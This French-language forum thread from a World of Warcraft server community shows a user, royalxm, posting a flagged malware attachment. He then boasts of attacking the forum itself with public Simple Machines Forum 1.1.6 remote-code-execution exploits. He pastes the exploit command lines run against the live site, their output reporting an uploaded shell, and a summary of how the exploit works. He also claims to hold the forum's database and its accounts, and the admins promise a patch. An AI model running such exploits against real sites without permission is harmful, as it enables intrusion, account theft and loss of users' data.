Auteur Sujet: hello i m royalxm  (Lu 6942 fois)

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
salut je suis royalxm elfe de la nuit
« Modifié: 05 novembre 2008, 16:12:38 par Randdrick »

Hors ligne franck77

  • Développeurs
  • Legendaire Member
  • ****
  • Messages: 2043
pourquoi un virus ?
« Modifié: 05 novembre 2008, 15:01:43 par franck77 »

Hors ligne Branruz

  • Développeurs
  • Grand Marechal
  • ****
  • Messages: 4718
  • Calif à la place du Calif
Salut royalxm,

Bienvenu sur le forum de Waad.

PS: A quoi sert ton fichier joint ?
(si tu ne donne pas d'explication, il va etre purement et simplement supprimé du thread)

Hors ligne franck77

  • Développeurs
  • Legendaire Member
  • ****
  • Messages: 2043
Branruz vire le ... il contiens un virus

Hors ligne Randdrick

  • Administrator
  • Connetable
  • *****
  • Messages: 6568
  • Grand Calif
    • W.A.A.D - WoW Ascent Arbonne DB
Fichier supprimé
Le cerveau est l'organe le moins utilisé par l'être humain...

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
dudes ... I love your forum ;)

Edit: sujet fusionné, pas au bon endroit, fichier attaché supprimé,
(format inconnu (jpeg.jpg))

« Modifié: 05 novembre 2008, 17:26:45 par Branruz »

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
oups
dsl, excuser moi !! c pas un virus


Edit: elimination d'un mot! ;)
« Modifié: 05 novembre 2008, 17:24:45 par Branruz »

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
c'est lol car se forum et hacker by royalxm

faille smf 1.1.6

le lien de la faille

http://www.milw0rm.com/exploits/6993


C:\PHP_tests>php test.php -url http://arbonne.games-rpg.net/ -bid 548 -user royalxm:momop
apa
#
#   Simple Machines Forum (SMF) 1.1.6 Remote Code Execution Exploit
#     by Charles FOL <charlesfol[at]hotmail.fr>
#
# Logged in as royalxm
# Waiting 5 secs (flood control)
Post syccessfully edited, everything done.
Now, just have to wait for an admin to see your post,

Post URL :
µ*********** royalxm haha

donc securiser la faille merci et re dsl pour le virus

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
VI - Exploit
#
# L'exploit se connecter avec votre compte d'utilisateur, et de présenter un nouveau poste / sujet contenant une
# Attachement, un paquet zippé, qui permet l'exécution de code distant, une fois installé.
# Ensuite, il va obtenir la saisie ID, déterminer attachement nom, et modifier à votre sujet
# Ajouter une image à distance (à l'aide de [img] [/ img]).
# Ensuite, vous aurez à attendre pour un administrateur de voir votre message ... et le paquet sera installé.
#

Hors ligne Randdrick

  • Administrator
  • Connetable
  • *****
  • Messages: 6568
  • Grand Calif
    • W.A.A.D - WoW Ascent Arbonne DB
Merci beaucoup l'information concernant cette faille. En effet, le message de Dude contenait un lien et ce fameux fichier jpg, qui ont été tous les deux supprimés.

Il n'y a pas eu de Package installé. La faille va être sécurisée au plus vite.
Le cerveau est l'organe le moins utilisé par l'être humain...

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
bien sur je vais rien faire sur se forum car je suis pas  >:D mais me trainter bien une petit gaf bye forum


pour admin mettre le forum en maintenant jusqua smf sort la version suivant qui va sortir demain

ha oui j'ai rien voler cette pour tester la faille il me failler un cobaye fait attention car les hacker attaque la nuit alors attention

cordialement royalxm

Hors ligne Randdrick

  • Administrator
  • Connetable
  • *****
  • Messages: 6568
  • Grand Calif
    • W.A.A.D - WoW Ascent Arbonne DB
Bonjour,

Ne t'inquiètes pas, nous traitons tout le monde bien sur ce forum. Dès que le correctif de SMF sera sorti, il sera appliqué bien entendu.

Cordialement.
Le cerveau est l'organe le moins utilisé par l'être humain...

Hors ligne Branruz

  • Développeurs
  • Grand Marechal
  • ****
  • Messages: 4718
  • Calif à la place du Calif
Citer
c'est lol car se forum et hacker by royalxm
fo rien exagérer non plus!  :D :D
mais merci bien pour l'info, je connaissais pas!
« Modifié: 06 novembre 2008, 02:15:22 par Branruz »

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
ENCORS UNE FAILLE MDR
voila le lien
http://www.milw0rm.com/exploits/7011


*C:\Perl\bin>smf.pl -s http://arbonne.games-rpg.net -u royalxm -p XXXXXXXX-d
[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
[ii] Session ID = 0d6c135c7689c956c2340232003423cb
[ii] User Id = 391
[ii] Uploaded a shell...
[!!] magic_quotes is turned on

C:\Perl\bin>smf.pl -s http://arbonne.games-rpg.net -u royalxm -p XXXXXXX
[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution
[!!] magic_quotes is turned on


UN SHELL et dans votre dossier je peux tout controler alors COMME J4AI ADMIN MAIS TON FOFO EN MAINTEMANCE JUSQUA LA NOUVELLE VERSION SMF
« Modifié: 06 novembre 2008, 14:29:18 par royalxm »

Hors ligne royalxm

  • Newbie
  • *
  • Messages: 9
Bonjour,

Ne t'inquiètes pas, nous traitons tout le monde bien sur ce forum. Dès que le correctif de SMF sera sorti, il sera appliqué bien entendu.

Cordialement.

tu parle dans 2 semaine elle seras sortie moi je men fou j'ai votre bdd ce qui me failler plient de compte wow lool  >:D